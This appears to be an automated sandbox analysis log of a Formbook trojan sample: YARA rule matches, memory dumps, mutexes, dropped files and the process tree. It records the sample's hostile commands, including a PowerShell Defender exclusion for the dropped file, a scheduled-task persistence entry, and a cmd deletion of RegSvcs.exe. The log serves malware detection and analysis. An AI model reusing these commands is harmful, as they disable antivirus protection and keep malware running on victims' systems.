Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FFB1	15_2_04D0FFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FF09	15_2_04D0FF09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C538E0	15_2_04C538E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CBD800	15_2_04CBD800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C59950	15_2_04C59950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6B950	15_2_04C6B950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CE5910	15_2_04CE5910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFDAC6	15_2_04CFDAC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CEDAAC	15_2_04CEDAAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C95AA0	15_2_04C95AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF1AA3	15_2_04CF1AA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07A46	15_2_04D07A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FA49	15_2_04D0FA49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC3A6C	15_2_04CC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C8DBF9	15_2_04C8DBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC5BF0	15_2_04CC5BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6FB80	15_2_04C6FB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FB76	15_2_04D0FB76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6D7FE	15_2_02B6D7FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6E53C	15_2_02B6E53C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B59E60	15_2_02B59E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52FB0	15_2_02B52FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52D90	15_2_02B52D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B52D89	15_2_02B52D89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA036	15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAE5CD	15_2_04AAE5CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA2D02	15_2_04AA2D02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA1082	15_2_04AA1082
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA8912	15_2_04AA8912
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAB232	15_2_04AAB232
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA5B32	15_2_04AA5B32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA5B30	15_2_04AA5B30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012BEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01285130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 011AEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 012CF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01297E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0123B970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01187E54 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CCF290 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C3B970 appears 280 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C85130 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04CBEA12 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04C97E54 appears 111 times

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162617003.00000000070D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2156300043.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2162157198.00000000057D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158917960.0000000003F7E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Binary or memory string: OriginalFilenamedKJy.exe: vs SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KfYvtUBOq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@296/11@13/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00723C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

15_2_00723C66

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_0072205A CoCreateInstance,

15_2_0072205A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Mutant created: \Sessions\1\BaseNamedObjects\FuBOvzWrVeorQDb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Local\Temp\tmp89CA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: WLDP.DLL		15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: localserver		15_2_00724136

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Virustotal: Detection: 24%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
